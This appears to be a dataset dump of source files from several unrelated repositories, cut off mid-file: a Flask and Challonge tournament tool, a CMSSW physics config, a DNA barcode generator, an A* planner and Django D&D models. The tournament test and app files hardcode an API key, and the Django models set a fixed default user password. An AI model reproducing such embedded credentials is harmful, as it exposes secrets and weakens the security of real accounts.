[ { "alpha_fraction": 0.67100590467453, "alphanum_fraction": 0.6745561957359314, "avg_line_length": 35.739131927490234, "blob_id": "bfd92683056fff454834621a1cd9d99cab1c42ce", "content_id": "104f18f4345aca1c0111d079dd82a67ff91c3219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 845, "license_type": "no_license", "max_line_length": 72, "num_lines": 23, "path": "/src/test/test_challonge.py", "repo_name": "gitter-badger/auTO-2", "src_encoding": "UTF-8", "text": "import challonge\nimport unittest\n\n\nclass TestChallonge(unittest.TestCase):\n def setUp(self):\n self.api_username = 'davethecust'\n self.api_key = 'bMSeYjdu2GA5CtC4Dc3dPz8l6C1VgS4x5bpnV4cv'\n self.tournament_url = '42k5wcre'\n\n def test_get_tournament(self):\n challonge.set_credentials(self.api_username, self.api_key)\n tournament = challonge.tournaments.show(self.tournament_url)\n self.assertEqual(tournament['name'], 'test')\n\n def test_get_participants(self):\n challonge.set_credentials(self.api_username, self.api_key)\n tournament = challonge.tournaments.show(self.tournament_url)\n participants = challonge.participants.index(tournament[\"id\"])\n\n test_players = ['DTMP', 'zaxtorp', 'hamroctopus', 'davethecust']\n for player in participants:\n self.assertIn(player['name'], test_players)\n" }, { "alpha_fraction": 0.7215189933776855, "alphanum_fraction": 0.746835470199585, "avg_line_length": 14.800000190734863, "blob_id": "b74cd64fef91a2925427bc8a43611993ffe29fcf", "content_id": "c9a0184a3ce049a44871a321f52fba3dbb459104", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 158, "license_type": "no_license", "max_line_length": 58, "num_lines": 10, "path": "/requirements.txt", "repo_name": "gitter-badger/auTO-2", "src_encoding": "UTF-8", "text": "# auTO requirements #\nFlask\n\n# challonge + deps #\npython-dateutil\niso8601\n-e git+http://github.com/russ-/pychallonge#egg=pychallonge\n\n# raspi deps #\npibrella\n" }, { "alpha_fraction": 0.6625000238418579, "alphanum_fraction": 0.6642857193946838, "avg_line_length": 18.310344696044922, "blob_id": "c9c0729bd79f7826b46047ceb0903ab79927694f", "content_id": "26dcbaa5b9f3fc87c207e30bc45fcad912514464", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "no_license", "max_line_length": 66, "num_lines": 29, "path": "/src/server/app.py", "repo_name": "gitter-badger/auTO-2", "src_encoding": "UTF-8", "text": "import sys\nimport pdb\n\nimport challonge\nfrom flask import Flask\n\n#from client/prototype_client.py import client as prototype_client\n\napi_email = 'davethecust'\napi_key = 'bMSeYjdu2GA5CtC4Dc3dPz8l6C1VgS4x5bpnV4cv'\n\napp = Flask('auTO')\n\[email protected]('/dump', methods=['PUT'])\ndef state_dump():\n pass\n \[email protected]('/sync_state', methods=['GET'])\ndef sync_state():\n pass\n\ndef configure():\n challonge.set_credentials(api_email, api_key)\n \t\nif __name__ == \"__main__\":\n configure()\n tournament_url = sys.argv[1] \n tournament = challonge.tournaments.show(tournament_url)\n app.run()\n" }, { "alpha_fraction": 0.4516128897666931, "alphanum_fraction": 0.4516128897666931, "avg_line_length": 30, "blob_id": "7805e404f1a0f976a59a8ba83ef1a3c02395db57", "content_id": "c9c47edab9cabb49115b9ef69ef92897e78ffbc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 62, "license_type": "no_license", "max_line_length": 30, "num_lines": 2, "path": "/README.rst", "repo_name": "gitter-badger/auTO-2", "src_encoding": "UTF-8", "text": "Automatic Tournament Organizer\n==============================\n" } ]
4
bmarzocc/PhysicsTools
https://github.com/bmarzocc/PhysicsTools
953bb9f47d454237b2588a306bad2e7e910b3be1
e6e437c47e1b0aaa2e316fb5d35b721ffb34bc94
be207c0e6f9c0733045bd70561ef4b0c605cb044
refs/heads/master
2021-01-21T07:00:33.420730
2013-12-13T14:03:26
2013-12-13T14:03:26
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7446327805519104, "alphanum_fraction": 0.7548022866249084, "avg_line_length": 32.358489990234375, "blob_id": "b10617e76ac40b75794a9ca178aa8f5e5039024b", "content_id": "b4a20c7e98bdc7ecde28f76e72bbadf1d56ec448", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1770, "license_type": "no_license", "max_line_length": 131, "num_lines": 53, "path": "/JetFlavourReader/test/printJetFlavour.py", "repo_name": "bmarzocc/PhysicsTools", "src_encoding": "UTF-8", "text": "import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"testJET\")\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.load(\"SimGeneral.HepPDTESSource.pythiapdt_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring('/store/caf/user/bmarzocc/RadionToHHTo2G2B_M-300_TuneZ2star_8TeV-nm-madgraph_AODSIM_18.root')\n)\n\nprocess.printTree = cms.EDAnalyzer(\"ParticleListDrawer\",\n src = cms.InputTag(\"genParticles\"),\n maxEventsToPrint = cms.untracked.int32(1)\n)\n\nprocess.myPartons = cms.EDProducer(\"PartonSelector\",\n withLeptons = cms.bool(False),\n src = cms.InputTag(\"genParticles\")\n)\n\nprocess.flavourByRef = cms.EDProducer(\"JetPartonMatcher\",\n jets = cms.InputTag(\"ak5PFJets\"),\n coneSizeToAssociate = cms.double(0.3),\n partons = cms.InputTag(\"myPartons\")\n)\n\nprocess.flavourByVal = cms.EDProducer(\"JetFlavourIdentifier\",\n srcByReference = cms.InputTag(\"flavourByRef\"),\n physicsDefinition = cms.bool(False)\n)\n\nprocess.printEvent = cms.EDAnalyzer(\"printJetFlavour\",\n srcSelectedPartons = cms.InputTag(\"myPartons\"),\n srcByReference = cms.InputTag(\"flavourByRef\"),\n srcByValue = cms.InputTag(\"flavourByVal\")\n)\n\nprocess.printEventNumber = cms.OutputModule(\"AsciiOutputModule\")\n\n#process.TFileService = cms.Service(\"TFileService\",\n# fileName = cms.string('prova.root')\n#)\n\nprocess.p = cms.Path(process.printTree*process.myPartons*process.flavourByRef*process.flavourByVal*process.printEvent)\nprocess.outpath = cms.EndPath(process.printEventNumber)\nprocess.MessageLogger.destinations = cms.untracked.vstring('cout','cerr')\n#process.MessageLogger.cout = cms.PSet(\n# threshold = cms.untracked.string('ERROR')\n#)\n\n\n" }, { "alpha_fraction": 0.7352380752563477, "alphanum_fraction": 0.738095223903656, "avg_line_length": 44.60869598388672, "blob_id": "d35d373216290faf7218b1a581e84436f5db7c67", "content_id": "a6c9609603ebb006a918b944cc7dc3df4fd1352e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1050, "license_type": "no_license", "max_line_length": 143, "num_lines": 23, "path": "/README.md", "repo_name": "bmarzocc/PhysicsTools", "src_encoding": "UTF-8", "text": "PhysicsTools\n============\n\n1) JetFlavourReader:\n \n Vary simple analyzer (JetFlavourReader/plugins/printJetFlavour.cc) exploting CMSSW tools:\n \n SimDataFormats/JetMatching/interface/JetFlavour.h\n SimDataFormats/JetMatching/interface/JetFlavourMatching.h\n SimDataFormats/JetMatching/interface/MatchedPartons.h\n SimDataFormats/JetMatching/interface/JetMatchedPartons.h\n \n it can be launched in local by means of: JetFlavourReader/test/printJetFlavour.py\n or be launched in grid by means of: JetFlavourReader/test/crab/crab_printJetFlavour.cfg\n \n This analyzer can run on AODSIM format.\n \n The output is a txt. For each jet it's written:\n \n event_luminosy - event_id - jet_pt jet - jet_eta - jet_phi - jet_energy - jet_flavour - #_processed_jet - #_processed_jet with flavour != 0\n \n If you want to have h2globe read the output, in order to fill the flattrees jet_flavour branch, you must put it\n in /afs/cern.ch/work/b/bmarzocc/public/RadionAnalysis_DONOTREMOVE/. Be careful to the output name! \n" } ]
2
Manaro-Alpha/Astar
https://github.com/Manaro-Alpha/Astar
b642be263f7e2477602a111d26e874fdddc4a511
d98aa7758326da4d3d0d8fa89b9485fa807cc907
34116777d00778f91088d0c60915cc2d7b6bd372
refs/heads/main
2023-07-19T14:01:59.427633
2021-09-10T16:33:25
2021-09-10T16:33:25
405,143,257
0
0
null
2021-09-10T16:22:30
2021-09-10T16:22:33
2021-09-10T16:33:26
null
[ { "alpha_fraction": 0.5369332432746887, "alphanum_fraction": 0.5714043378829956, "avg_line_length": 35.577640533447266, "blob_id": "62f9093cac503651d73b04ffd1898f9e4a3ebd68", "content_id": "3b123c5c7305eff1133e7678a8bb97a0b0620aac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5889, "license_type": "no_license", "max_line_length": 307, "num_lines": 161, "path": "/Astar.py", "repo_name": "Manaro-Alpha/Astar", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport operator\nfrom shapely.geometry import Point, Polygon, LineString\nfrom itertools import product,permutations\n\n\nclass Node:\n def __init__(self,x,y,cost,parent,nearest_nodes,index):\n self.x=x\n self.y=y\n self.parent=parent\n self.cost=cost\n self.nearest_nodes=nearest_nodes\n self.index=index\n\nclass Astar:\n obstacle_list=[[(2, 10), (7, 10), (6, 7), (4, 7), (4, 9), (2, 9)],[(3, 1), (3, 6), (4, 6), (4, 1)],[(7, 3), (7, 8), (9, 8), (9, 3)]]\n \n def within(obstacle_list,rnd_node):\n #checking if point is valid\n isWithin=False\n point=Point(rnd_node[0],rnd_node[1])\n if(point.within(Polygon(obstacle_list[0]))==True or point.within(Polygon(obstacle_list[1]))==True or point.within(Polygon(obstacle_list[2]))==True):\n isWithin=True\n return isWithin\n\n def cross(obstacle_list,rnd_node,x,y):\n isCrosses=False\n point=Point(rnd_node[0],rnd_node[1])\n node=(x,y)\n coord=(rnd_node,node)\n line=LineString(coord)\n if(line.crosses(Polygon(obstacle_list[0]))==True or line.crosses(Polygon(obstacle_list[1]))==True or line.crosses(Polygon(obstacle_list[2]))==True or point.touches(Polygon(obstacle_list[0]))==True or point.touches(Polygon(obstacle_list[1])) ==True or point.touches(Polygon(obstacle_list[2]))==True):\n isCrosses=True\n return isCrosses\n\n\n start=(0,0)\n goal=(10,10)\n num_nodes=1000\n rate=0.8\n \n #Generating the node network\n nodes=[]\n nodes.append(Node(start[0],start[1],0,0,[],0))\n a=np.arange(0,10.5,0.5).tolist()\n b=list(product(a,repeat=2))\n for coord in b:\n if(within(obstacle_list,coord)==True):\n continue\n nodes.append(Node(coord[0],coord[1],0,0,[],len(nodes)))\n for i in range(0,len(nodes)-1):\n dist=math.sqrt((coord[0]-nodes[i].x)**2 + (coord[1]-nodes[i].y)**2)\n if(dist<rate and cross(obstacle_list,coord,nodes[i].x,nodes[i].y)==False):\n nodes[i].nearest_nodes.append(len(nodes)-1)\n nodes[len(nodes)-1].nearest_nodes.append(i)\n \n ''' nodes.append(Node(goal[0],goal[1],0,0,[],len(nodes)))\n for i in range(0,len(nodes)):\n dist=math.sqrt((nodes[i].x-goal[0])**2 + (nodes[i].y-goal[1])**2)\n if(dist<rate and cross(obstacle_list,goal,nodes[i].x,nodes[i].y)==False):\n nodes[i].nearest_nodes.append(len(nodes)-1)\n nodes[len(nodes)-1].nearest_nodes.append(i)\n '''\n \n ''' for i in range(0,num_nodes):\n rnd_node=(random.uniform(0,10),random.uniform(0,10))\n node=Node(rnd_node[0],rnd_node[1],0,0,[],len(nodes))\n\n if(within(obstacle_list,rnd_node)==True):\n continue\n nodes.append(node)\n\n for i in range(0,len(nodes)-1):\n dist=math.sqrt((rnd_node[0]-nodes[i].x)**2 + (rnd_node[0]-nodes[i].y)**2)\n if(dist<=rate and cross(obstacle_list,rnd_node,nodes[i].x,nodes[i].y)==False):\n nodes[i].nearest_nodes.append(len(nodes)-1)\n nodes[len(nodes)-1].nearest_nodes.append(i)\n\n nodes.append(Node(goal[0],goal[1],0,0,[],len(nodes)))\n for i in range(0,len(nodes)):\n dist=math.sqrt((nodes[i].x-goal[0])**2 + (nodes[i].y-goal[1])**2)\n if(dist<=rate and cross(obstacle_list,rnd_node,nodes[i].x,nodes[i].y)==False):\n nodes[i].nearest_nodes.append(len(nodes)-1)\n nodes[len(nodes)-1].nearest_nodes.append(i)\n\n '''\n \n #Astar\n #start\n open_list=[]\n IsGoal=False\n for node in nodes:\n node.cost=1000000000\n nodes[0].cost=0\n for index in nodes[0].nearest_nodes:\n nodes[index].cost=math.sqrt((nodes[0].x-nodes[index].x)**2 + (nodes[0].y-nodes[index].y)**2) + math.sqrt((nodes[index].x-goal[0])**2 + (nodes[index].y-goal[1])**2)\n nodes[index].parent=0\n \n for node in nodes:\n open_list.append([node.index,node.cost])\n open_list.sort(key=lambda x:x[1])\n\n while(IsGoal==False and len(open_list)>0):\n if(open_list[0][0]==len(nodes)-1): \n #len(nodes)-1 is the last nodes index \n IsGoal=True\n \n for index in nodes[open_list[0][0]].nearest_nodes:\n cost=open_list[0][1] + math.sqrt((nodes[open_list[0][0]].x-nodes[index].x)**2 + (nodes[open_list[0][0]].y-nodes[index].y)**2) + math.sqrt((nodes[index].x-goal[0])**2 + (nodes[index].y-goal[1])**2)\n if(cost<nodes[index].cost):\n nodes[index].cost=cost\n nodes[index].parent=open_list[0][0]\n \n open_list.pop(0)\n for array in open_list:\n array[1]=nodes[array[0]].cost\n open_list.sort(key=lambda x:x[1])\n\n poly1=Polygon(obstacle_list[0])\n poly2=Polygon(obstacle_list[1])\n poly3=Polygon(obstacle_list[2])\n x1,y1=poly1.exterior.xy\n x2,y2=poly2.exterior.xy\n x3,y3=poly3.exterior.xy\n plt.plot(x1,y1)\n plt.plot(x2,y2)\n plt.plot(x3,y3)\n #plotting the nodes and path\n '''\n for node in nodes:\n for index in node.nearest_nodes:\n plt.scatter([node.x,nodes[index].x],[node.y,nodes[index].y],color='r')\n '''\n \n current=len(nodes)-1\n plot_list=[]\n\n while(current!=0):\n plot_list.append(nodes[current])\n current=nodes[current].parent\n\n plot_list.append(Node(start[0],start[1],0,0,[],0))\n plot_list.reverse()\n i=0\n while i<len(plot_list)-1:\n plt.plot([plot_list[i].x,plot_list[i+1].x],[plot_list[i].y,plot_list[i+1].y],color='blue')\n i=i+1\n for node in plot_list:\n plt.scatter(node.x,node.y,color='blue',s=30)\n \ndef main():\n print(\"start planning\")\n astar=Astar()\n\nif __name__=='__main__':\n print(\"start\")\n main()\nplt.show()\n" } ]
1
darachm/freebarcodes
https://github.com/darachm/freebarcodes
5ec8a2c0d3d3efd2f492323f943a6a63d72d956d
32942d05154af5cdc3ddfbc56e8d733030cdd5dd
9b196e88fb1670b81ca882d5fd0560a60fab312e
refs/heads/master
2020-06-01T02:31:13.511630
2019-06-06T21:14:13
2019-06-06T21:14:13
190,598,088
0
0
null
2019-06-06T14:44:03
2019-05-13T21:32:30
2019-05-13T21:32:27
null
[ { "alpha_fraction": 0.555782675743103, "alphanum_fraction": 0.5654653310775757, "avg_line_length": 39.76754379272461, "blob_id": "1ce174398dd8c26526c120ccd0a8234dee7093c6", "content_id": "e90476bd57b4c1365e4328230eb127c429abc025", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9295, "license_type": "no_license", "max_line_length": 119, "num_lines": 228, "path": "/freebarcodes/generate.py", "repo_name": "darachm/freebarcodes", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport numpy as np\nimport FreeDivSphere\nimport editmeasures\nfrom seqtools import bases, dna_rev_comp, dna2num, num2dna\nimport psutil\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\ndef possible_barcode_iterator(k, AT_max, GC_max):\n \"\"\"\n Iterates all k-mers such that:\n AT count <= AT_max\n GC count <= GC_max\n No triplet homopolymers\n\n k :int: barcode k-mer length\n AT_max :int:\n GC_max :int:\n \"\"\"\n bases_and_incs = [('A', np.array([1, 0, 0, 0])),\n ('C', np.array([0, 1, 0, 0])),\n ('G', np.array([0, 0, 1, 0])),\n ('T', np.array([0, 0, 0, 1]))]\n\n def recursive_extension(prev_seq, prev_cnt): # No defaults\n bad_bases = ''\n if prev_seq[-2] == prev_seq[-1]: # Don't allow triplets\n bad_bases += prev_seq[-1]\n if prev_seq[-1] == 'G': # Illumina has higher errors with GGC\n bad_bases += 'C'\n if prev_cnt[0] + prev_cnt[3] == AT_max: # Enforce AT/GC content within bounds\n bad_bases += 'AT'\n elif prev_cnt[1] + prev_cnt[2] == GC_max:\n bad_bases += 'CG'\n for i in range(len(prev_seq)-4): # Don't allow rev-comp seqs of 3+ bp\n if dna_rev_comp(prev_seq[i+1:i+3]) == prev_seq[-2:]:\n bad_bases += dna_rev_comp(prev_seq[i])\n\n\n if len(prev_seq) + 1 == k:\n for base in bases:\n if base in bad_bases:\n continue\n else:\n yield prev_seq + base\n else:\n for base, inc in bases_and_incs:\n if base in bad_bases:\n continue\n for seq in recursive_extension(prev_seq + base, prev_cnt + inc):\n yield seq\n\n def iterate_seqs():\n for b1, c1 in bases_and_incs:\n for b2, c2 in bases_and_incs:\n for seq in recursive_extension(b1 + b2, c1 + c2):\n yield seq\n\n return iterate_seqs\n\n\ndef idx_possible_barcode_iterator(k, AT_max, GC_max):\n def iterate_seqs():\n for seq in possible_barcode_iterator(k, AT_max, GC_max)():\n yield dna2num(seq)\n return iterate_seqs\n\n\nclass FreeDivBarcodeGenerator(object):\n \"\"\"\n A class to generate a set of barcodes via the FreeDiv semimetric.\n \"\"\"\n # Algorithm explanation:\n # \n # In a metric space, one can reserve spheres around each new codeword of radius 2*max_err, and\n # any remaining word not reserved by any codeword is a valid new codeword. The FreeDiv\n # semimetric does not give that guarantee. However, the above algorithm is still useful in\n # that any word so reseved is guaranteed to not be a valid codeword. Hence, we perform the\n # following steps:\n #\n # 1. Alphabetically iterate (for the Conway closure) through the words of acceptable\n # composition until finding a word still marked with int(0). For that word, check its\n # decode sphere. If all words in the decode sphere are marked < int(2), add codeword.\n # 2. After adding a codeword, reseve two surrounding spheres of different radii:\n # -A sphere of radius max_err, the decode sphere, marked with int(2)\n # -A sphere of radius 2*max_err, the approx encode sphere, marked with int(1), careful to\n # not overwrite any 2's\n # 3. Repeat until space exhausted.\n\n def __init__(self, bc_len, max_err, seq_idx_iter_func=None):\n self.bc_len = bc_len\n self.max_err = max_err\n self._codewords = set()\n self.barcodes = set()\n self.manual_codewords = set()\n needed_bytes = 4**self.bc_len\n available_bytes = psutil.virtual_memory().available\n if needed_bytes > available_bytes:\n raise RuntimeError('Not enough memory. {:,d} bytes needed, {:,d} bytes available'.format(\n needed_bytes,\n available_bytes\n ))\n\n self.reserved_words = np.zeros((needed_bytes, ), dtype=np.uint8)\n if seq_idx_iter_func is not None:\n self.seq_idx_iter_func = seq_idx_iter_func\n else:\n self.seq_idx_iter_func = lambda : xrange(4**self.bc_len)\n\n def _add_codeword(self, cw_idx):\n assert isinstance(cw_idx, int), '{} is not a valid codeword. Must be int'.format(cw_idx)\n self._codewords.add(cw_idx)\n for seq_idx in self.iterate_approx_encode_sphere(cw_idx):\n if self.reserved_words[seq_idx] == 0:\n # Important to not overwrite previous 2's\n self.reserved_words[seq_idx] = 1\n for seq_idx in self.iterate_decode_sphere(cw_idx):\n self.reserved_words[seq_idx] = 2\n\n def iterate_decode_sphere(self, center_idx):\n word = num2dna(center_idx, self.bc_len)\n for seq_idx in FreeDivSphere.FreeDivSphere(word, self.max_err).parallel_num_iterator():\n yield seq_idx\n\n def iterate_approx_encode_sphere(self, center_idx):\n word = num2dna(center_idx, self.bc_len)\n for seq_idx in FreeDivSphere.FreeDivSphere(word, 2*self.max_err, min_r=self.max_err+1).parallel_num_iterator():\n yield seq_idx\n\n def _add_barcode(self, seq_idx):\n assert self._idx_is_available(seq_idx), seq_idx\n self.barcodes.add(seq_idx)\n self._codewords.add(seq_idx)\n self._add_codeword(seq_idx)\n\n def add_dnastr_nonbarcode_codeword(self, dnastring):\n seq_idx = dna2num(dnastring)\n self.add_idx_nonbarcode_codeword(seq_idx)\n \n def add_idx_nonbarcode_codeword(self, seq_idx):\n self.manual_codewords.add(seq_idx)\n self._add_codeword(seq_idx)\n\n def dnastr_codeword_is_available(self, dnastring):\n seq_idx = dna2num(dnastring)\n self._idx_is_available(seq_idx)\n \n def _idx_is_available(self, test_idx):\n if self.reserved_words[test_idx] != 0:\n return False\n else:\n for seq_idx in self.iterate_decode_sphere(test_idx):\n if self.reserved_words[seq_idx] == 2:\n return False\n return True\n\n def Conway_closure(self, tmp_fpath=None):\n for seq_idx in self.seq_idx_iter_func():\n if self._idx_is_available(seq_idx):\n self._add_barcode(seq_idx)\n log.info('Found barcode {}'.format(len(self.barcodes) + 1))\n if tmp_fpath:\n with open(tmp_fpath, 'a') as out:\n out.write('{}\\n'.format(num2dna(seq_idx, self.bc_len)))\n\n def Conway_closure_until_satisfied(self, n_desired_barcodes):\n for seq_idx in self.seq_idx_iter_func():\n if self._idx_is_available(seq_idx):\n self._add_barcode(seq_idx)\n log.info('Found barcode {}: {}'.format(len(self.barcodes) + 1,\n num2dna(seq_idx, self.bc_len)))\n if len(self.barcodes) >= n_desired_barcodes:\n return\n\n @property\n def dna_barcodes(self):\n return (num2dna(seq_idx, self.bc_len) for seq_idx in self.barcodes)\n\n def manual_barcodes_test(self):\n bc_list = list(self.barcodes)\n for i in range(len(self.barcodes)):\n bc1 = num2dna(bc_list[i], self.bc_len)\n for j in range(i+1, len(self.barcodes)):\n bc2 = num2dna(bc_list[j], self.bc_len)\n dist = editmeasures.free_divergence(bc1, bc2)\n if dist < self.max_err:\n log.error('!'*10 + ' FAIL ' + '!'*10)\n log.error('Distance {} between {} and {}.'.format(dist, bc1, bc2))\n return\n log.info('Barcodes Pass Manual Check')\n\n\ndef generate_barcodes(arguments):\n import time\n start_time = time.time()\n fpath = os.path.join(arguments.output_dir,\n 'barcodes{}-{}.txt'.format(arguments.barcode_length,\n arguments.num_errors))\n tmp_fpath = os.path.join(arguments.output_dir,\n 'barcodes{}-{}.txt.tmp'.format(arguments.barcode_length,\n arguments.num_errors))\n GC_max = min(range(arguments.barcode_length), key=lambda x:\n abs(float(x)/arguments.barcode_length-0.6))\n log.info('Barcode length: {}'.format(arguments.barcode_length))\n log.info('AT/GC max: {}'.format(GC_max))\n bc_iter = idx_possible_barcode_iterator(arguments.barcode_length, GC_max, GC_max)\n sbg = FreeDivBarcodeGenerator(arguments.barcode_length,\n arguments.num_errors,\n bc_iter)\n sbg.Conway_closure(tmp_fpath=tmp_fpath)\n with open(fpath, 'w') as out:\n out.write('\\n'.join(sorted(sbg.dna_barcodes)))\n os.remove(tmp_fpath)\n comp_time = time.time() - start_time\n log.info('Barcode generation time: {}'.format(comp_time))\n\n\nif __name__ == '__main__':\n usg = '{} <bc_len> <max_err> <out_dir>'.format(sys.argv[0])\n if len(sys.argv) != len(usg.split()):\n sys.exit('Usage: {}'.format(usg))\n bc_len, max_err = map(int, sys.argv[1:3])\n dpath = sys.argv[3]\n write_barcodes(bc_len, max_err, dpath)\n" }, { "alpha_fraction": 0.42268040776252747, "alphanum_fraction": 0.6597937941551208, "avg_line_length": 12.857142448425293, "blob_id": "5c4aa417d08eaadb229d6b2a6a29953132fcb38b", "content_id": "c3df75b52f476aef619141f0679010c3b1c1f1fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 97, "license_type": "no_license", "max_line_length": 15, "num_lines": 7, "path": "/requirements.txt", "repo_name": "darachm/freebarcodes", "src_encoding": "UTF-8", "text": "pathos==0.2.1\npsutil==5.3.1\nh5py==2.7.1\nnumpy==1.13.3\ndocopt==0.6.2\nbiopython==1.70\ncython==0.24\n" } ]
2
NickJacksonDev/DnD-Manager
https://github.com/NickJacksonDev/DnD-Manager
e777951268ca5f7a9a62dd9410446c5ee092158c
36f416e56770a2a8c60e93652c084e32f96f86fa
6052b1d422ebcbfc0f169ec613b1f71da976bdb8
refs/heads/master
2020-04-21T04:14:34.279087
2019-04-08T16:45:44
2019-04-08T16:45:44
169,307,667
1
0
null
2019-02-05T20:28:12
2019-04-08T15:23:16
2019-04-08T16:45:45
Python
[ { "alpha_fraction": 0.71403568983078, "alphanum_fraction": 0.7189359664916992, "avg_line_length": 37.778282165527344, "blob_id": "f24821f573db5c74431bbec3b30e7f9e3188a8e7", "content_id": "ab67b99c2a5003e817bda6c5b5b4fd7abb5708d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8571, "license_type": "no_license", "max_line_length": 130, "num_lines": 221, "path": "/Character_Builder/models.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom datetime import datetime\n\n# Notes (Django models)\n# Each model acts more or less like a database table\n# Each model's field acts like a column in said table\n# Foreign Keys act as a thing that links a class\n# to a parent class that uses it.\n# eg: abilityScore's \"characterID\" is a foreign key\n# https://docs.djangoproject.com/en/2.1/topics/db/models/\n# can do fieldName = ___Field(blank = true) to make this field optional\n# can do fieldName = ___Field(choices = LIST_NAME) to make it have a dropdown to the choices given\n# can do from geography.models import ZipCode\n\n# Constants\n# Should I move this next to the class that uses it?\nMAX_LENGTH_CHARACTER_NAME = 255\nMAX_LENGTH_ALIGNMENT = 255\nMAX_LENGTH_SIZE = 255\nDEFAULT_LEVEL = 0\nDEFAULT_XP = 0\nDEFAULT_HP = 6\n\nMAX_LENGTH_ABILITY_NAME = 255\n\nMAX_LENGTH_CLASS_NAME = 255\nMAX_LENGTH_HIT_DICE = 255\n\nMAX_LENGTH_RACE_NAME = 255\n\nDEFAULT_ABILITY_SCORE = 10\nDEFAULT_ABILITY_SCORE_BONUS = 0\n\nDEFAULT_DATETIME = datetime.min\n\n\n# Description of this model file\n# Much of this will be based off of the database schemas\n\n# As this is in the character builder folder, this will focus on\n# the character information\n\n# finds a default user\ndef defaultUser():\n default = User.objects.first()\n\n if default is None:\n default = User.objects.create_user('defaultUser', password='djangoproject', last_login=DEFAULT_DATETIME)\n\n return default\n\n# Sets default race to human\ndef defaultRace():\n default = CharacterRace.objects.first()\n\n if default is None:\n default = CharacterRace(\n raceName='Human',\n speed=30,\n size='Medium',\n\n strengthBonus=1,\n dexterityBonus=1,\n constitutionBonus=1,\n intelligenceBonus=1,\n wisdomBonus=1,\n charismaBonus=1\n )\n default.save()\n\n # Returns the primary key, not the race itself\n return default.raceID\n\n# Sets default class to fighter\ndef defaultClass():\n default = CharacterClass.objects.first()\n\n if default is None:\n default = CharacterClass(\n className='Fighter',\n hitDice='d8'\n )\n default.save()\n \n return default.characterID\n\n\n# This class is largely static, like a lookup table\n# Note: because the character has a key to this, it must\n# be above the Character class\nclass CharacterRace(models.Model):\n raceID = models.AutoField(primary_key=True)\n raceName = models.CharField(max_length = MAX_LENGTH_RACE_NAME)\n speed = models.IntegerField()\n size = models.CharField(max_length = MAX_LENGTH_SIZE) # Okay to overload?\n\n # Welp, I'm going to make this simpler and just hard-code\n # the 6 most essential stats\n strengthBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n dexterityBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n constitutionBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n intelligenceBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n wisdomBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n charismaBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n\n # Outdated code\n # abilityScoreBonusSetID = models.IntegerField() # Same level of abstraction?\n # character = models.ForeignKey(Character, on_delete=models.CASCADE, null=True)\n\n def __str__(self):\n return self.raceName\n\n\n\n# This class is largely static, like a lookup table\nclass CharacterClass(models.Model):\n # TODO: Maybe use ManyToMany relationship, as one character may have multiple \n # classes... Oh wait. That's actually something to consider... \n # character = models.ForeignKey(Character, on_delete=models.CASCADE, null=True, blank=True) \n characterID = models.AutoField(primary_key=True)\n className = models.CharField(max_length = MAX_LENGTH_CLASS_NAME)\n hitDice = models.CharField(max_length = MAX_LENGTH_HIT_DICE)\n\n def __str__(self):\n return self.className\n\n\n\n\n\n\n# This class is dynamic, the level, xp, hp, alignment, and (rarely) size may change\nclass Character(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser, null=True, blank=True)\n characterID = models.AutoField(primary_key=True) # Note that Django has a built-in primary key\n characterName = models.CharField(max_length = MAX_LENGTH_CHARACTER_NAME) # Is this a consistent level of abstraction?\n level = models.IntegerField(default=DEFAULT_LEVEL) # may have to split this up into a list as you may have multiple classes...\n xp = models.IntegerField(default=DEFAULT_XP)\n maxHP = models.IntegerField(default=DEFAULT_HP)\n currentHP = models.IntegerField(default=DEFAULT_HP)\n alignment = models.CharField(max_length = MAX_LENGTH_ALIGNMENT) # Use string or an enum?\n size = models.CharField(max_length = MAX_LENGTH_SIZE) # Use string or enum?\n public = models.BooleanField(default=True)\n\n # blank=true, null=true means that it's optional\n # Since race and class are constant, you DO NOT want to delete them upon\n # deleting this character.\n # Also, when restarting the database, it's important to only add one\n # foreign key per migration. As such, there are currently 3\n # foreign keys in character: User, race, and characterClass.\n # The current solution: comment out all but 1, make and migrate, then repeat\n # one at a time.\n race = models.ForeignKey(CharacterRace, on_delete=models.PROTECT, default=defaultRace, null=True, blank=True)\n characterClass = models.ForeignKey(CharacterClass, on_delete=models.PROTECT, default=defaultClass, null=True, blank=True)\n\n # Outdated variables\n #raceID = models.IntegerField()\n #classID = models.IntegerField()\n #abilityScoreSetID = models.AutoField(primary_key=True)\n\n strength = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n dexterity = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n constitution = 